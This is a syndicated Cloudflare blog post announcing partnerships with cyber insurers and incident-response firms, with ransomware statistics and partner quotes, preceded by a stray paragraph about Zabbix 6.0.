A: In Zabbix 6.0 LTS Zabbix will try and automatically pick the corresponding type of information for your item. This is a great UX improvement since you don’t have to refer to the documentation every time you are defining a new item. And, yes, you will still be able to change the type of information manually – either because of preprocessing rules or if you’re simply doing some troubleshooting.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Post Syndicated from Deeksha Lamba original https://blog.cloudflare.com/cyber-risk-partnerships/

We are excited to announce our cyber risk partnership program with leading cyber insurance carriers and incident response providers to help our customers reduce their cyber risk. Cloudflare customers can qualify for discounts on premiums or enhanced coverage with our partners. Additionally, our incident response partners will work with us to accelerate mitigation when customers are under attack.

What is a business’ cyber risk?

Let’s start with an analogy for security and insurance: being a homeowner is an adventure and a responsibility. You personalize your home, maintain it, and make it secure against the slightest possibility of intrusion – fence it up, lock the doors, install a state-of-the-art security system, and so on. These measures definitely reduce the probability of an intrusion, but you still buy insurance. Why? To cover for the rare possibility that something might go wrong – human errors, like leaving the garage door open, or unlikely events, like a fire, hurricane, etc. And when something does go wrong, you call the experts (aka the police) to investigate and respond to the situation.

Running a business that has any sort of online presence is evolving along the same lines. Getting the right security posture in place is absolutely necessary to protect your business, customers, and employees from nefarious cyber attacks. But as a responsible business owner, CFO, or CISO, you nevertheless buy cyber insurance to protect your business from long-tail events that could allow malicious attackers into your environment, causing material damage to your business. And if such an event does take place, you engage with incident response companies for active investigation and mitigation.

In short, you do everything in your control to reduce your business’ cyber risk by having the right security, insurance, and active response measures in place.

The cyber insurance industry and the rise of ransomware attacks

Over the last two years, the rise of ransomware attacks has wreaked havoc on businesses and the cyber insurance industry. As per a Treasury Department report, nearly 600 million dollars in banking transactions were linked to possible ransomware payments in Suspicious Activity Reports (SARs) filed by financial services firms to the U.S. Government for the first six months of 2021, a jump of more than 40% over the total for all of 2020. Additionally, the Treasury Department investigators identified about 5.2 billion dollars in bitcoin transactions as potential ransomware payments, indicating that the actual amount of ransomware payments was much higher1.

The rise of these attacks has made businesses more cautious, and it should make them more inclined to put the right cybersecurity posture in place and to buy cyber insurance coverage.

Further, the rising frequency and severity of attacks, especially ransomware attacks, has led to increasing insurance claims and loss ratios (the ratio of what insurers pay out in claims to the total premiums their customers pay them) for the cyber insurers. As per a recent research report, the most frequent types of losses covered by cyber insurers were ransomware (41%), funds transfer loss (27%), and business email compromise incidents (19%). These trends are pushing legacy insurance carriers to reevaluate how much coverage they can afford to offer and how much they have to charge clients to do so, thereby triggering a structural change that can impact the ability of companies, especially small and medium businesses, to minimize their cyber risk.

The end result has been a drastic increase in the premiums and denial rates over the last 12 months amongst some carriers, which has pushed customers to seek new coverage. The premiums have increased upwards of 50%, according to infosec experts and vendors, with some quotes jumping closer to 100%.2 Also, the lack of accessible cyber insurance and proper coverage disproportionately impacts the small and medium enterprises that find themselves as the common target for these cyber attacks. According to a recent research report, 70% of ransomware attacks are aimed at organizations with less than 1,000 employees.3 The increased automation of cyber attacks coupled with the use of insecure remote access tools during the pandemic has left these organizations exposed all while being faced with increased cyber insurance premiums or no access to coverage.

While some carriers are excluding ransomware payments from customers’ policies or are denying coverage to customers who don’t have the right security measures in place, there is a new breed of insurance carriers that are incentivizing customers in the form of broader coverage or lower prices for proactively implementing cybersecurity controls.

Cloudflare’s cyber risk partnerships

At Cloudflare, we have always believed in making the Internet a better place. We have been helping our customers focus on their core business while we take care of their cyber security. We are now going a step further, helping our customers reduce their cyber risk by partnering with leading cyber insurance underwriters and incident response providers.

Our objective is to help our customers reduce their cyber risk. We are doing so in partnership with several leading companies highlighted below. Our customers can qualify for enhanced coverage and discounted premiums for their cyber insurance policies by leveraging their security posture with Cloudflare.


Insurance companies: Powered by Cloudflare’s security suite, our customers have comprehensive protection against the most common and severe threat vectors. In most cases, when attackers see that a business is using Cloudflare, they realize they will not be able to execute a denial of service (DoS) attack or infiltrate the customer’s network, and they prefer to spend their time on more vulnerable targets. As a result, our customers face a lower frequency and severity of attacks, an ideal customer set that can translate into a lower loss ratio for underwriters. Our partners understand the security benefits of using Cloudflare’s security suite and allow our customers to qualify for lower premium rates and enhanced coverage.

Cloudflare customers can qualify for discounts/credits on premiums and enhanced coverage with our partners At-Bay, Coalition, and Cowbell Cyber.

“An insurance policy is an effective tool to articulate the impact of security choices on the financial risk of a company. By offering better pricing to companies who implement stronger controls, like Cloudflare’s Comprehensive DDoS Protection, we help customers understand how best to reduce risk. Incentivizing our customers to adopt innovative security solutions like Cloudflare, combined with At-Bay’s free active risk monitoring, has helped reduce ransomware in At-Bay’s portfolio 7x below the market average.”
Rotem Iram, Co-founder and CEO, At-Bay

“It’s incredible what Cloudflare has done to create a safer Internet. When Cloudflare’s technology is paired with insurance, we are able to protect businesses in an entirely new way. We are excited to offer Cloudflare customers enhanced cyber insurance coverage alongside Coalition’s active security monitoring platform to help businesses build true cyber resilience with an always-on insurance policy.”
Joshua Motta, Co-founder & CEO, Coalition

“We are excited to work with Cloudflare to address our customers’ cybersecurity needs and help reduce their cyber risk. Collaborating with cybersecurity companies like Cloudflare will definitely enable a more data-driven underwriting approach that the industry needs.”
Nate Walsh, Head of Strategic Partnerships, Corvus Insurance

“The complexity and frequency of cyber attacks continue to rise, and small and medium enterprises are increasingly becoming the center of these attacks. Through partners like Cloudflare, we want to encourage these businesses to adopt the best security standards and proactively address vulnerabilities, so they can benefit from savings on their cyber insurance policy premiums.”
Jack Kudale, Founder and CEO, Cowbell Cyber

Incident Response companies: Our incident response partners deal with active under-attack situations day in, day out, helping customers mitigate the attack and get their web property and network back online. Too often, precious time is wasted trying to figure out which security vendor to reach out to and how to get hold of the right team. We are announcing new relationships with prominent incident response providers CrowdStrike, Mandiant, and Secureworks to enable rapid referral of organizations under attack. As a refresher, my colleague James Espinosa wrote a great blog post on how Cloudflare helps customers against ransomware DDoS attacks.

“The speed in which a company is able to identify, investigate and remediate a threat heavily determines how it will fare in the end. Our partnership with Cloudflare provides companies the ability to take action rapidly and contain exposure at the time of an attack, enabling them to get back on their feet and return to business as usual as quickly as possible.”
Thomas Etheridge, Senior Vice President, CrowdStrike Services

“As cyber threats continue to rapidly evolve, the need for organizations to put response plans in place increases. Together, Mandiant and Cloudflare are enabling our mutual customers to mitigate the risk breaches pose to their business operations. We hope to see more of these much-needed technology collaborations that help organizations address the growing threat of ransomware and DDoS attacks in a timely manner.”
Marshall Heilman, EVP & Chief Technology Officer, Mandiant

“Secureworks’ proactive incident response and adversarial testing expertise combined with Cloudflare’s intelligent global platform enables our mutual customers to better mitigate the threats of sophisticated cyberattacks. This partnership is a much needed approach to addressing advanced cyber threats with speed and automation.”
Chris Bell, Vice President – Strategic Alliances, Secureworks

What’s next?

In summary, Cloudflare and its partners are coming together to ensure that our customers can run their business while getting adequate cybersecurity and risk coverage. However, we will not stop here. In the coming months, we’ll be working on creating programmatic ways to share threat intelligence with our cyber risk partners. Through our Security Center, we want to enable our customers, if they so choose, to safely share their security posture information with our partners for easier, transparent underwriting. Given the scale of our network and the magnitude and heterogeneity of attacks that we witness, we are in a strong position to provide our partners with insights around long-tail risks.

If you are interested in learning more, please refer to the partner links (At-Bay, Coalition, and Cowbell Cyber) or visit our cyber risk partnership page. If you’re interested in becoming a partner, please fill out this form.

Sources:
1. https://www.wsj.com/articles/suspected-ransomware-payments-for-first-half-of-2021-total-590-million-11634308503
2. Gallagher, Cyber Insurance Market Update, Mid-year 2021: https://www.ajg.com/us/news-and-insights/2021/aug/global-cyber-market-update/
3. https://searchsecurity.techtarget.com/news/252507932/Cyber-insurance-premiums-costs-skyrocket-as-attacks-surge